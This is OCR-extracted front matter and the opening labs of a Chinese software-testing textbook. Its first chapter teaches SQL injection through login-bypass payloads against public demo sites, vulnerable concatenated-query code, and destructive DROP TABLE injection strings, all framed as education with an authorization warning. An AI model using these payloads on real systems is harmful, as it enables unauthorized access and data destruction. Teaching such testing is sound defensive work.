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本 书 是 众多 资深 工程 师 十 多 年 从 事 软 件 测试 的 经 验 与 智慧 的 结晶 ,有 总 结 有 点 评 、 有 提高 .能 实践 ， 
可 以 迅速 指导 项 目 实 战 ,提升 个 人 与 团队 技能 ,提高 正在 研发 的 软件 产品 质量 。 

全 书 分 3 篇。 第 一 篇 为 寻找 软件 缺陷 实 训 ,通过 众多 资深 工程 师 对 Bug 技术 的 经 验 分 享 以 及 上 百 个 
经 典 软件 缺陷 的 展示 与 分 析 ,力图 让 读者 做 到 “ 熟 读 唐诗 三 百 首 ,不 会 作 诗 也 会 吟 ”。 第 二 篇 为 设计 测试 用 
例 实 训 , 既 有 传统 的 黑 盒 (基于 软件 功能 ?测试 用例 设计 ,也 有 白 盒 (基于 代码 本 身 ) 测 试用 例 设 计 , 还 有 回 
归 ( 基 于 局 部 变动 ) 测 试用 例 设 计 , 通 过 对 众多 系统 的 测试 用 例 设 计 与 分 析 , 帮 助 读者 对 测试 用 例 有 一 个 全 
面 的 认识 ,引导 读者 从 模仿 到 实践 再 到 创新 。 第 三 篇 为 使 用 测试 工具 实 训 , 既 有 自动 化 测试 工具 ,也 有 
Web 安全 扫描 渗透 工具 和 性 能 测试 工具 。 

本 书 适合 作为 高 校 计算 机 及 软件 工程 各 专业 的 软件 实践 教材 ,能 够 引导 大 学 生 深入 理解 软件 开发 与 
软件 测试 ,进入 软件 开发 或 软件 测试 领域 。 


本 书 封 面 贴 有 清华 大 学 出 版 社 防伪 标签 ,无 标签 者 不 得 销售 。 
版 权 所 有 ,侵权 必 究 。 侵 权 举 报 电话 : 010-62782989 13701121983 
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随 着 我 国 改革 开放 的 进一步 深化 ,高 等 教育 也 得 到 了 快速 发 展 ,各 地 高 校 紧密 结合 地 方 
经 济 建设 发 展 需要 ,科学 运用 市 场 调节 机 制 ,加 大 了 使 用 信息 科学 等 现代 科学 技术 提升 、 改 
造 传 统 学 科 专 业 的 投入 力度 ,通过 教育 改革 合理 调整 和 配置 了 教育 资源 ,优化 了 传统 学 科 专 
业 ,积极 为 地 方 经 济 建设 输送 人 才 ,为 我 国 经 济 社会 的 快速 健康 和 可 持续 发 展 以 及 高 等 教 
育 自身 的 改革 发 展 做 出 了 巨大 贡献 。 但 是 ,高 等 教育 质量 还 需要 进一步 提高 以 适应 经 济 社 
会 发 展 的 需要 ,不 少 高 校 的 专业 设置 和 结构 不 尽 合 理 , 教 师 队伍 整体 素质 或 待 提高 ,人 才 培 
养 模式 .教学 内 容 和 方法 需要 进一步 转变 ,学 生 的 实践 能 力 和 创新 精神 路 待 加 强 。 

教育 部 一 直 十 分 重视 高 等 教育 质量 工作 。2007 4E 1 月 ,教育 部 下 发 了 《关于 实施 高 等 
学 校本 科教 学 质量 与 教学 改革 工程 的 意见 》, 计 划 实 施 “ 高 等 学 校本 科教 学 质量 与 教学 改革 
工程 (简称 “质量 工程 ')”, 通 过 专业 结构 调整 .课程 教材 建设 ,实践 教学 改革 、 教 学 团队 建设 
等 多 项 内 容 , 进 一 步 深化 高 等 学 校 教学 改革 ,提高 人 才 培 养 的 能 力 和 水 平 ,更 好 地 满足 经 济 
社会 发 展 对 高 素质 人 才 的 需要 。 在 贯彻 和 落实 教育 部 “质量 工程 ”的 过 程 中 ,各 地 高 校 发 挥 
师资 力量 强 、 办 学 经 验 丰 富 、 教 学 资源 充裕 等 优势 ,对 其 特色 专业 及 特色 课程 ( 群 ) 加 以 规划 、 
整理 和 总 结 ,更 新 教学 内 容 、 改 革 课 程 体系 ,建设 了 一 大 批 内 容 新 、 体 系 新 、 方 法 新 、 手 段 新 的 
特色 课程 。 在 此 基础 上 ,经 教育 部 相关 教学 指导 委员 会 专家 的 指导 和 建议 ,清华 大 学 出 版 社 
在 多 个 领域 精 选 各 高 校 的 特色 课程 ,分 别 规划 出 版 系列 教材 ,以 配合 “质量 工程 ”的 实施 , 满 
足 各 高 校 教学 质量 和 教学 改革 的 需要 。 

为 了 深入 贯彻 落实 教育 部 (关于 加 强 高 等 学 校本 科教 学 工作 ,提高 教学 质量 的 若干 意 
见 ) 精 神 , 紧 密 配合 教育 部 已 经 启动 的 “高 等 学 校 教学 质量 与 教学 改革 工程 精品 课程 建设 工 
作 ”, 在 有 关 专 家 、 教 授 的 倡议 和 有 关 部 门 的 大 力 支持 下 ,我 们 组 织 并 成 立 了 “清华 大 学 出 版 
社 教材 编审 委员 会 "(以 下 简称 “ 编 委 会 ”) , 旨 在 配合 教育 部 制定 精品 课程 教材 的 出 版 规划 ， 
讨论 并 实施 精品 课程 教材 的 编写 与 出 版 工作 。“ 编 委 会 ?成 员 皆 来 自 全 国 各 类 高 等 学 校 教学 
与 科研 第 一 线 的 骨干 教师 ,其 中 许多 教师 为 各 校 相关 院 、 系 主管 教学 的 院 长 或 系 主任 。 

按照 教育 部 的 要 求 ,“ 编 委 会 ”一 致 认为 ,精品 课程 的 建设 工作 从 开始 就 要 坚持 高 标准 、 
严 要 求 , 处 于 一 个 比较 高 的 起 点 上 ; 精品 课程 教材 应 该 能 够 反映 各 高 校 教 学 改革 与 课程 建 
设 的 需要 ,要 有 特色 风格 有 创新 性 (新 体系 、 新 内 容 、 新 手段 .新 思路 ,教材 的 内 容 体系 有 较 
高 的 科学 创新 、 技 术 创 新 和 理念 创新 的 含量 )、 先 进 性 (对 原 有 的 学 科 体 系 有 实质 性 的 改革 和 
发 展 ,顺应 并 符合 21 世纪 教学 发 展 的 规律 ,代表 并 引领 课程 发 展 的 趋势 和 方向 ) ,示范 性 ( 教 
材 所 体现 的 课程 体系 具有 较 广泛 的 辐射 性 和 示范 性 ) 和 一 定 的 前 脆性 。 教 材 由 个 人 申报 或 
各 校 推荐 (通过 所 在 高 校 的 “ 编 委 会 "成 员 推荐 ) ,经 “ 编 委 会 认真 评审 ,最 后 由 清华 大 学 出 版 
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社 审定 出 版 。 
目前 ,针对 计算 机 类 和 电子 信息 类 相关 专业 成 立 了 两 个 “ 编 委 会 ”, 即 “清华 大 学 出 版 社 
计算 机 教材 编审 委员 会 > 和 * 清 华 大 学 出 版 社 电子 信息 教材 编审 委员 会 >。 推 出 的 特色 精品 


教材 包括 : 

(1) 21 世纪 高 等 学 校规 划 教材 。 计算 机 应 用 一 一 高 等 学 校 各 类 专业 ,特别 是 非 计算 机 
专业 的 计算 机 应 用 类 教材 。 

(2) 21 世纪 高 等 学 校规 划 教材 。 计算 机 科学 与 技术 一 一 高 等 学 校 计算 机 相关 专业 的 
教材 。 


(3) 21 世纪 高 等 学 校规 划 教材 电子 信息 一 一 高 等 学 校 电子 信息 相关 专业 的 教材 。 
(4) 21 世纪 高 等 学 校规 划 教材 "软件 工程 一 高 等 学 校 软件 工程 相关 专业 的 教材 。 
(5) 21 世纪 高 等 学 校规 划 教材 "信息 管理 与 信息 系统 。 

(6) 21 世纪 高 等 学 校规 划 教材 "财经 管理 与 应 用 。 

CD 21 世纪 高 等 学 校规 划 教材 ， 电子 商务 。 

(8) 21 世纪 高 等 学 校规 划 教材 物 联网 。 


清华 大 学 出 版 社 经 过 三 十 多 年 的 努力 ,在 教材 尤其 是 计算 机 和 电子 信息 类 专业 教材 出 
版 方面 树立 了 权威 品牌 ,为 我 国 的 高 等 教育 事业 做 出 了 重要 责 献 。 清 华 版 教材 形成 了 技术 
准确 、 内 容 严 谨 的 独特 风格 ,这 种 风格 将 延续 并 反映 在 特色 精品 教材 的 建设 中 。 


清华 大 学 出 版 社 教材 编审 委员 会 
KRA: 魏 江 江 
E-mail: weijj(? tup. tsinghua. edu. cn 





“软件 测试 ?课程 是 信息 管理 与 信息 系统 专业 的 计算 机 方向 核心 课程 之 一 。 一 直 以 来 ， 
我 想 找 一 本 软件 测试 领域 既 有 理论 又 有 实践 的 书 ,最 后 有 幸 找 到 王 顺 教授 主编 的 (软件 测试 
工程 师 成 长 之 路 一 一 软件 测试 方法 与 技术 实践 指南 Java EE 篇 (第 3 版 )》。 这 本 书 是 目前 
国内 软件 测试 领域 理论 与 实践 结合 较 好 的 教材 ,比较 适合 目前 本 科教 学 方案 所 要 求 的 理论 
与 实践 相 结 合 的 目标 。 

但 是 在 软件 测试 实验 与 实 训 课 上 ,我 发 现 这 本 书 对 于 实 训 的 指导 力度 还 不 够 。 我 联系 
了 王 顺 教 授 , 提 出 了 自己 的 想法 : 最 好 能 有 一 个 团队 开发 项 目 , 并 能 将 项 目 进行 模块 化 ,让 
更 多 的 学 生 对 实际 项 目 研发 有 初步 印象 ,并 在 此 基础 上 进行 测试 ,以 案例 的 方式 让 学 生 对 软 
件 测试 有 更 深 的 了 解 。 

也 是 机 缘 巧 合 ,刚好 我 有 一 个 数字 化 旅游 平台 研发 项 目 , 于 是 和 王 顺 教授 商量 ,以 数字 
化 旅游 平台 研发 为 驱动 目标 ,以 王 顺 教授 为 项 目 经 理 ,带领 学 生 , 对 软件 架构 数据库 设 计 、 
代码 审计 文档 编写 .软件 测试 .系统 上 线 、 服 务 器 配置 与 加 固 等 整个 过 程 进行 指导 ,并 将 该 
平台 划分 为 景区 智能 导航 系统 、 景 点 互动 展示 系统 、 到 此 一 游 电子 刻字 系统 、 景 区 特产 优惠 
购 ,个 性 化 旅游 空间 服务 平台 等 模块 ,让 学 生 以 团队 方式 选择 模块 进行 参与 。 经 过 半年 的 努 
71 ,数字 化 旅游 平台 研发 项 目 基 本 完成 。 感 谢 王 顺 教授 ,经 过 他 的 指导 ,学 生 对 软件 架构 JE 
发 ,测试 等 过 程 有 了 初步 掌握 ,并 取得 了 不 小 的 进步 。 看 到 学 生 进 步 ,我 又 产生 了 一 个 想法 : 
能 不 能 把 这 个 过 程 记录 下 来 ,让 全 国 各 大 高 校 学 生 , 尤 其 是 信息 管理 与 信息 系统 专业 的 学 
生 , 以 项 目 案 例 驱动 的 方式 学 习 “ 软 件 测试 "课程 ,把 软件 测试 实验 与 实 训 课程 落 到 实处 。 

本 书 就 这 样 在 我 的 脑海 中 形成 ,当然 更 多 的 是 考虑 到 这 样 方便 自己 以 后 教学 (我 想 这 也 
是 广大 教师 的 需要 ) 。 经 过 和 王 顺 教授 的 沟通 ,结合 软件 测试 工程 师 实际 工作 ,我 们 认为 作 
为 软件 测试 工程 师 最 核心 也 是 最 基本 的 是 做 好 如 下 三 件 事 。 

(1) Find Bug, 即 寻找 软件 缺陷 的 本 领 。 测 试 工 程 师 需 要 对 软件 缺陷 非常 敏感 ,能 够 快 
速 找到 软件 缺陷 并 能 准确 地 汇报 缺陷 。 

(2) Design Test Case, 即 设计 优秀 的 测试 用 例 。 这 需要 测试 工程 师 对 一 个 软件 或 一 个 
模块 能 够 准确 把 握 ,严密 地 设计 出 优秀 的 测试 用 例 。 

(3) Use Test Tool, 即 使 用 测试 工具 。 选 择 适 合 项 目的 测试 工具 ,取决 于 测试 工程 师 对 
测试 工具 的 敏感 程度 。 在 实践 项 目 中 ,如 有 需要 ,可 以 对 工具 进行 二 次 开发 与 扩展 ,以 帮助 
项 目 提高 质量 ,快速 找到 软件 缺陷 。 虽 然 现在 测试 工具 非常 多 ,但 是 只 要 多 使 用 ,多 尝试 ,就 
能 找到 适合 当前 项 目 或 应 用 场景 的 好 工具 。 

既然 软件 测试 工程 师 的 核心 技能 体现 在 上 述 三 个 方面 ,那么 就 应 该 将 这 三 项 技能 最 大 
限度 地 展示 给 学 生 , 以 及 那些 即将 进入 或 已 经 进入 软件 测试 行业 的 工程 师 们 。 

本 书 可 以 作为 全 国 各 大 高 校 软件 测试 与 质量 保证 实验 与 实 训 教 程 ,全 国 各 大 软件 公司 
软件 测试 工程 师 入 职 教程 ,全 国 各 大 软件 培训 机 构 软 件 测试 工程 师 培训 实战 教程 , 想 参加 国 
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际 软件 测试 外 包 或 众 包 人 员 的 测试 技能 提高 指导 书籍 , 想 从 事 软件 测试 工作 或 已 经 成 为 软 
件 测试 工程 师 成 员 的 工作 指导 书 ,软件 开发 工程 师 、 软 件 项 目 管理 师 、 系 统 架构 师 研 发 高 质 
量 软 件 参考 书 , 言 若 金 叶 软件 研究 中 心 “软件 工程 师 认 证 ”测试 工程 师 方向 认证 指导 书籍 , 言 
车 金 叶 软件 研究 中 心 “ 全 国 大 学 生 软 件 实践 与 创新 能 力 大 赛 " 参 赛 指 导 书 籍 。 

本 书 根 据 软 件 测试 工程 师 的 核心 工作 与 技能 要 求 分 为 三 篇 进行 讲解 。 

第 一 篇 : 寻找 软件 缺陷 实 训 。 本 篇 分 为 5 大 实验 方向 ,分 别 是 软件 安全 测试 训练 .软件 
界面 测试 训练 .软件 功能 测试 训练 软件 技术 测试 训练 .软件 探索 测试 训练 。 每 个 方向 20 个 
Bug, 共 100 个 经 典 Bug。 通 过 众多 资深 工程 师 对 Bug 技术 的 经 验 分 享 以 及 上 百 个 经 典 软 
件 缺 陷 的 展示 与 分 析 ,力图 让 读者 做 到 * 熟 读 唐诗 三 百 首 ,不 会 作 诗 也 会 吟 ”。 

第 二 篇 : 设计 测试 用 例 实 训 。 本 篇 分 为 10 大 实验 方向 ,分 别 是 设计 智慧 城市 类 测试 用 
例 . 设 计 在 线 会 议 类 测试 用 例 .设计 在 线 协 作 类 测试 用 例 .设计 电子 商务 类 测试 用 例 .设计 电 
子 书籍 类 测试 用 例 ,设计 手机 应 用 类 测试 用 例 、 设 计 注册 /登录 白 盒 测试 用 例 、 设 计 好 友 / 粉 
丝 白 盒 测试 用 例 ,设计 积分 /游记 白 盒 测试 用 例 、 设 计 回归 测试 类 测试 用 例 。 既 有 传统 的 黑 
盒 ( 基 于 软件 功能 ) 测 试用 例 设 计 , 也 有 和 白 盒 (基于 代码 本 身 ) 测 试用 例 设 计 , 还 有 回归 (基于 
局 部 变动 ) 测 试用 例 设计 。 通 过 对 众多 系统 的 测试 用 例 设计 与 分 析 , 帮 助 读者 对 测试 用 例 有 
一 个 全 面 的 认识 ,引导 读者 从 模仿 到 实践 再 到 创新 。 

第 三 篇 : 使 用 测试 工具 实 训 。 本 篇 分 为 6 大 实验 方向 ,分 别 是 自动 化 测试 工具 JMeter 
训练 .自动 化 测试 工具 GT 训练 ,安全 渗透 测试 工具 ZAP 训练 .安全 集成 攻击 平台 Burp 
Suite 训练 ,性 能 测试 工具 wrk 训练 .性 能 测试 工具 WebLOAD 训练 。 既 有 自动 化 测试 工 
具 , 也 有 Web 安全 扫描 渗透 工具 和 性 能 测试 工具 。 引 起 读者 对 软件 测试 工具 的 兴趣 ,正确 
使 用 工具 可 以 事半功倍 ,否则 会 里 足 不 前 ,影响 项 目 进程 。 

本 书 由 陈 英 、 王 顺 、 王 瑞 、 严 兴 莉 编著 。 具 体 编写 分 工 为 : 第 一 篇 由 陈 英 、 王 顺 合作 完 
成 ; 第 二 篇 的 实验 6.7 由 王 珊 完成 ,实验 12 一 14 由 严 兴 莉 完 成 ,实验 8— 11.15 由 陈 英 完 
成 ; 第 三 篇 的 实验 16 由 王 瑞 完 成 ,实验 17 由 甘 佳 完成 ,实验 18.19 由 陈 英和 王 顺 合作 完 
成 ,实验 20.21 由 严 兴 莉 完成 。 为 保持 书籍 章节 的 连贯 性 , 王 顺和 陈 英 进行 了 统 稿 。 为 了 使 
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团队 成 员 刘 倩 凋 、 徐 福 东 工程 师 对 书 中 展示 的 所 有 经 典 Bug 进行 了 整理 、 核 对 与 复 现 ,以 方 
便 读 者 能 很 容易 地 重 现 Bug ,加 深 对 软件 缺陷 的 理解 ; 同时 对 测试 用 例 与 测试 工具 进行 实 
验 。4 位 成 员 从 不 同 的 角度 阅读 、 重 现实 验 , 保 证 了 可 操作 性 。 
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的 梅 俊 峰 、 黄 成 龙 . 张 成 帆 、. 唐 勇 . 叶 慧 茹 、 骆 伶俐 、 钟 承 娣 . 曾 卓 、 周 汪 涛 、 杨 丽 娜 、. 李 泽 慧 等 。 
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的 全 国 大 学 生 软 件 实践 与 创新 能 力 大 赛 。 书 中 部 分 经 典 的 Bug 与 设计 优良 的 测试 用 例 取 
材 来 源 于 学 生 的 参赛 作品 。 

为 了 使 读者 容易 复 现 书 中 丰富 的 Bug 实例 与 测试 技巧 ,所 举例 子 主要 从 中 心 创建 的 各 
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大 网 站 中 提取 (避免 其 他 网 站 因 修 改 或 删除 不 能 访问 ) 。 

为 了 让 读者 进行 Client 测试 跨 平台 测试 体验 , 跨 地 域 合 作 项 目 在 线 跟踪 系统 (http:// 
www. worksnaps. net) 和 工时 卡 系统 (http://www. workcard. net) 都 支持 三 个 平台 
(Windows, Linux 和 Mac) 的 下 载 安 装 与 测试 。 

感谢 清华 大 学 出 版 社 提供 的 这 次 合作 机 会 ,使 本 实践 教程 能 够 早日 与 大 家 见面 。 
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问 ,请 发 送 E-mail 到 tsinghua. group@gmail. com 或 roy. wang123(9 gmail. com, 编 者 团队 
将 会 及 时 给 予 回 复 。 

如 果 想 得 到 更 多 言 若 金 叶 软件 研究 中 心 编写 的 软件 实践 类 教程 ,请 访问 http://books. 
rogisoft. com。 本 书 的 官网 是 http://books. roqisoft. com/xtest, 欢 迎 大 家 进入 官网 查看 最 
新 的 书籍 动态 ,下 载 配套 资源 ,与 我 们 进行 更 深层 次 的 交流 和 分 享 。 
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寻找 软件 缺陷 实 训 


【 本 篇 导读 】 


本 篇 通过 软件 测试 领域 专家 、 高 级 软件 测试 
、 言 若 金 叶 软件 研究 中 心 历年 全 国 大 学 生 
软件 实践 与 创新 能 力 大 赛 中 冠军 和 亚军 对 寻找 Bug 
技术 的 经 验 分 享 以 及 数 百 个 经 典 软 件 缺陷 的 展示 
与 分 析 ， 力 图 让 读者 做 到 “ 熟 读 唐诗 三 百 首 ， 不 
会 作 诗 也 合 哈 ”。 

软件 技术 日 新 月 异 ， 我 们 不 断 地 跟踪 前 沿 技 
术 ， 对 Bug 按 安 人 全、 界面、 功能、 技术 、 探 索 五 大 
方向 进行 展示 ,与 国际 软件 测试 市 场 实战 接轨 。 
希望 读者 能 通过 本 篇 练 就 过 硬 的 寻找 Bug 的 本 领 ， 
找到 技术 共鸣 。 

本 篇 对 许多 Bug 不 仅 提 供 了 如 何 找到 类 似 Bug 
的 方法 ， 还 告诉 读者 这 类 Bug 为 什么 合 出 现 ， 以 及 
正确 的 修复 方法 : 有 的 Bug 与 服务 器 设置 有 关 ， 许 
多 开发 人 员 也 不 清楚 具体 如 何 设置 ， 所 以 更 加 需 
要 服务 器 管理 人 员 多 注意 最 新 的 技术 。 本 篇 对 开 
发 高 质量 软件 具有 很 强 的 指导 意义 。 希望 每 个 人 
都 能 学 到 自己 所 需要 的 内 容 。 
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为 实施 国家 安全 战略 ,加 快 网 络 空间 安全 高 层次 人 才 培 养 ,2015 
年 6 月 “网 络 空间 安全 "正式 被 教育 部 批准 为 国家 一 级 学 科 。Web 
的 开放 性 与 普及 性 ,导致 目前 世界 网 络 空间 70% 以 上 的 安全 问题 都 
来 自 Web 安全 攻击 。 

软件 测试 工程 师 需要 不 断 跟 踪 软 件 领 域 的 前 沿 知识 ,提升 专业 技 
术 水 平 。 通 过 本 实验 的 学 习 , 每 位 读者 都 能 切身 感受 到 安全 其 实 离 我 
们 并 不 远 ,我 们 能 通过 简单 的 验证 ,确定 待 测 网 站 是 否 做 了 必要 的 安 
全 防护 ,以 此 提升 每 位 成 员 的 安全 意识 。 

注意 : 本 实验 讲解 的 安全 技术 对 系统 的 破坏 性 很 大 ,为 避免 法 律 
纠纷 ,请 务必 慎 用 。 请 在 自己 设计 的 网 站 上 测试 ,或 者 在 得 到 授权 多 
许 做 安全 测试 之 后 , 才 可 以 用 各 种 安全 测试 技术 或 安全 测试 工具 进行 
安全 测试 (本 实验 所 举 的 样 例 网 站 ,都 是 可 以 公开 进行 各 种 安全 测 
试 的 ) 。 


1.1 实验 #1: testfire 网 站 有 SQL 注入 风险 


缺陷 标题 testfire 网 站 一 登录 页 面 一 登录 框 有 SQL 注入 攻击 
问题 。 
测试 平台 与 浏览 器 Windows 7 十 IE 9 或 Firefox。 
测试 步骤 
(1) 用 正 浏 览 器 打开 网 站 http://demo. testfire. net, 
(2) 打开 登录 页 面 。 
(3) 在 Username 文本 框 中 输入 'or '1'— 1. {E Password 文本 
框 中 输入 'or '1'='1,mE 1-1 所 示 。 
(4) 单 击 Login 按钮 。 
(5) 查看 结果 页 面 。 
期 望 结果 ”页面 显示 拒绝 登录 的 信息 。 


4 。 软件 测 斌 实验 实 训 指南 
`. 




















图 1-1 输入 SQL 注入 攻击 语句 段 


实际 结果 以 管理 员 身 份 成 功 登 录 , 如 图 1-2 所 示 。 
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1-2 以 管理 员 身份 成 功 登 录 
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SQL 注入 已 经 多 年 排 在 Web 安全 攻击 第 一 位 ,对 系统 的 破坏 性 很 大 。 如 果 一 个 系统 
的 整个 数据 库 内 容 都 被 窃取 ,那么 信息 社会 中 最 重要 的 数据 就 一 览 无 遗 了 。 所 谓 SQL 注入 
攻击 ,就 是 攻击 者 把 SQL 命令 插入 Web 表单 的 输入 域 或 页 面 请 求 的 查询 字符 囊 , 欺 骗 服务 
器 执行 恶意 的 SQL 命令 。 在 某 些 表单 中 ,用 户 输 入 的 内 容 直 接 用 来 构造 (或 者 影响 ) 动 态 
SQL 命令 ,或 作为 存储 过 程 的 输入 参数 ,这 类 表单 特别 容易 受到 SQL 注入 攻击 。 

SQL 注入 是 从 正常 的 WWW 端口 访问 ,而 且 表面 看 起 来 和 一 般 的 Web 页 面 访问 没 什 
么 区 别 , 所 以 目前 市 面 的 防火 墙 都 不 会 对 SQL 注入 发 出 警报 。 以 ASP. NET 网 站 为 例 , 如 
果 管 理 员 没 有 查看 IIS 日 志 的 习惯 ,可 能 被 入 侵 很 长 时 间 都 不 会 发 党 。SQL 注入 的 手法 相 
当 灵 活 , 在 注入 的 时 候 会 碰 到 很 多 意外 的 情况 ,攻击 者 能 够 根据 具体 情况 进行 分 析 , 构造 瑟 
妙 的 SQL 语句 ,从 而 成 功 获 取 想 要 的 数据 。 

常见 的 SQL 注入 攻击 过 程 如 下 。 

(1) ŽA ASP. NET Web 应 用 有 一 个 登录 页 面 ,这 个 登录 页 面 控制 着 用 户 是 否 有 权 访 
间 应 用 , 它 要 求 用 户 输 入 一 个 用 户 名 和 密码 。 

(2) 登录 页 面 中 输入 的 内 容 将 直接 用 来 构造 动态 的 SQL 命令 ,或 者 直接 用 作 存 储 过 程 
的 参数 。 下 面 是 ASP. NET 应 用 构造 查询 的 一 个 例子 。 

System. Text. StringBuilder query = new System. Text. StringBuilder( 

"SELECT * from Users WHERE login = '") 

. Append(txtLogin. Text). Append(" ' AND password = '") 

. Append( txtPassword. Text) . Append(" '") ; 

(3) 攻击 者 在 用 户 名 和 密码 文本 框 中 输入 ' or '1'='1, 

(4) 用 户 输入 的 内 容 提交 给 服务 器 之 后 ,服务 器 运行 上 面 的 ASP. NET 代码 构造 出 查 
询 用 户 的 SQL 命令 ,但 由 于 攻击 者 输入 的 内 容 非 常 特殊 ,所 以 最 后 得 到 的 SQL 命令 变 成 
SELECT * from Users WHERE login = "or '1'— '1' AND password = " or '1'—'1', 

(5) 服务 器 执行 查询 或 存储 过 程 ,将 用 户 输 入 的 身份 信息 和 服务 器 中 保存 的 身份 信息 
进行 对 比 ,但 是 遇 到 '1' 一 '1', 这 是 永 真 的 条 件 , 所 以 数据 库 系 统 就 会 有 返回 信息 。 

(6) 由 于 SQL 命令 实际 上 已 被 注入 攻击 修改 ,已 经 不 能 真正 验证 用 户 身份 ,所 以 系统 
会 错误 地 授权 给 攻击 者 。 

如 果 攻 击 者 知道 应 用 会 将 表单 中 输入 的 内 容 直接 用 于 验证 身份 的 查询 ,他 就 会 尝试 输 
入 某 些 特殊 的 SQL 字符 串 纂 改 查询 ,改变 其 原来 的 功能 ,欺骗 系统 授予 访问 权限 。 

SQL 注入 攻击 成 功 的 危害 ; 如 果 用 户 的 账户 具有 管理 员 或 其 他 比较 高 级 的 权限 ,攻击 
者 就 可 能 对 数据 库 中 的 表 执行 各 种 他 想 要 做 的 操作 ,包括 添加 、 删 除 或 更 新 数据 ,甚至 可 能 
直接 删除 表 。 一 旦 攻击 者 能 操作 数据 库 层 , 那 就 没有 什么 内 容 得 不 到 了 。 


1.2 实验 #2: testasp 网 站 有 SOL 注 人 风险 


缺陷 标题 testasp 网 站 -登录 一通 过 SQL 语句 无 须 密码 ,可 以 直接 登录 。 
测试 平台 与 浏览 器 Windows 7 十 Firefox 或 IE 11。 


6 。 软件 测试 实验 实 训 指 南 
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测试 步骤 
(1) 打开 testasp 网 站 http://testasp. vulnweb. com/ 。 
(2) 单 击 左 上 方 的 login 进入 登录 界面 。 
(3) 在 Username 文本 框 中 输入 admin'--, 密 码 可 随意 输入 。 
(4) 单 击 Login 按钮 ,如 图 1-3 所 示 。 









































图 1-3 登录 界面 
HEAR 不 能 登录 。 
实际 结果 ”登录 成 功 ,如 图 1-4 所 示 。 
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图 1-4 登录 成 功 
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常见 SQL 注入 攻击 有 如 下 类 型 。 

1. 没有 正确 过 滤 转 义 字符 

在 用 户 的 输入 没有 被 转 义 字符 过 滤 时 ,就 会 发 生 这 种 形式 的 注入 攻击 , 它 会 被 传递 给 一 
个 SQL 语句 。 这 样 就 会 导致 应 用 程序 的 终端 用 户 对 数据 库 中 的 语句 实施 操纵 。 例 如 ,下 面 
的 这 行 代码 就 会 导致 这 种 漏洞 。 





Statement = "SELECT * FROM users WHERE name = '" + userName + "';" 

这 行 代码 的 设计 目的 是 将 一 个 特定 的 用 户 从 其 用 户 表 中 取出 ,但 是 ,如 果 用 户 名 被 攻击 
者 用 一 种 特定 的 方式 伪造 ,这 个 语句 所 执行 的 操作 可 能 就 不 仅仅 是 代码 的 编写 者 所 期 望 的 
了 。 例 如 ,将 用 户 名 变量 ( 即 userName) 设 置 为 a'or 't' 一 't, 此 时 原始 语句 发 生 了 变化 。 

SELECT * FROM users WHERE name = 'a'or 't'- 't'; 

如 果 这 行 代码 被 用 于 一 个 认证 过 程 ,那么 就 能 够 强迫 选择 一 个 合法 的 用 户 名 ,因为 赋值 
t= KERER. 

在 一 些 SQL 服务 器 上 ,如 在 SQL Server 中 ,任何 一 个 SQL 命令 都 可 以 通过 这 种 方法 
注入 ,包括 执行 多 个 语句 。 下 面 语句 中 userName 的 值 将 会 导致 删除 users 表 , 又 可 以 从 
data 表 中 选择 所 有 的 数据 (实际 上 就 是 泄露 了 每 个 用 户 的 信息 ) 。 


a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '% 

这 将 使 最 终 的 SQL 语句 变 成 

SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '5 '; 

其 他 SQL 语句 不 会 将 执行 同样 查询 中 的 多 个 命令 作为 一 项 安全 措施 。 这 会 防止 攻击 
者 注入 完全 独立 的 查询 ,但 不 会 阻止 攻击 者 修改 查询 。 

2. 不 正确 的 数据 类 型 处 理 

如 果 一 个 用 户 提供 的 字段 并 非 一 个 强 类 型 ,或 者 没有 实施 类 型 强制 ,就 会 发 生 这 种 形式 
的 攻击 。 当 在 一 个 SQL 语句 中 使 用 一 个 数字 字段 时 ,如 果 程 序 员 没有 检查 用 户 输入 的 合法 
性 (是 否 为 数字 型 ) , 则 会 发 生 这 种 攻击 。 例 如 语句 

statement : = "SELECT * FROM data WHERE id = ”+ a variable * ";" 

从 这 个 语句 可 以 看 出 ,程序 员 和 希望 a_variable 是 一 个 与 id 字段 有 关 的 数字 。 不 过 ,如 果 
终端 用 户 选 择 一 个 字符 串 , 就 绕 过 了 对 转 义 字符 的 需要 。 例 如 ,将 a_variable 设置 为 

1;DROP TABLE users 
它 会 将 users 表 从 数据 库 中 删除 ,SQL 语句 变 成 

SELECT * FROM data WHERE id = 1;DROP TABLE users; 

3. 数据 库 服务 器 中 的 漏洞 

有 时 ,数据 库 服 务 器 软件 也 存在 漏洞 ,如 mysql real escape stringO € MySQL 服务 器 
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中 的 函数 漏洞 。 这 种 漏洞 允许 一 个 攻击 者 根据 错误 的 统一 字符 编码 执行 一 次 成 功 的 SQL 
注入 攻击 。 

4. 盲 日 SQL 注 人 攻击 

当 一 个 Web 应 用 程序 易于 遭受 攻击 而 其 结果 对 攻击 者 却 不 可 见 时 ,就 会 发 生育 目 
SQL 注入 攻击 。 有 漏洞 的 网 页 可 能 并 不 会 显示 数据 ,而 是 根据 注入 合法 语句 中 的 逻辑 语句 
的 结果 显示 不 同 的 内 容 。 这 种 攻击 相当 耗 时 ,因为 必须 为 每 一 个 获得 的 字 节 精心 构造 一 个 
新 的 语句 。 但 是 ,一 旦 漏洞 的 位 置 和 目标 信息 的 位 置 被 确定 ,一 种 称 为 Absinthe 的 工具 就 
可 以 使 这 种 攻击 自动 化 。 

5. 条 件 响应 

注意 ,有 一 种 SQL 注入 连 使 数据 库 在 一 个 普通 的 应 用 程序 屏幕 上 计算 一 个 逻辑 语句 的 
值 。 如 语句 SELECT booktitle FROM booklist WHERE bookld = 'OOkl4cd' AND 1—1 
会 导致 一 个 标准 的 SQL 执行 ,而 语句 SELECT booktitle FROM booklist WHERE bookld = 
'OOkl4cd' AND 1—2 在 页 面 受到 SQL 注入 攻击 时 有 可 能 给 出 一 个 不 同 的 结果 。 这 样 的 
注入 证 明 育 目的 SQL 注入 是 可 能 的 , 它 会 使 攻击 者 根据 另外 一 个 表 中 的 某 字 段 内 容 设计 可 
以 评判 真 伪 的 语句 。 

6. 条 件 性 差错 

如 果 WHERE 语句 为 真 , 则 这 种 类 型 的 盲目 SQL 注入 会 迫使 数据 库 评 判 一 个 引起 错 
误 的 语句 ,从 而 导致 一 个 SQL 错误 。 例 如 语句 


SELECT 1/0 FROM users WHERE username = 'Ralph' 


显然 ,如 果 用 户 Ralph 存在 ,被 零 除 将 导致 错误 。 

7. 时 间 延 误 

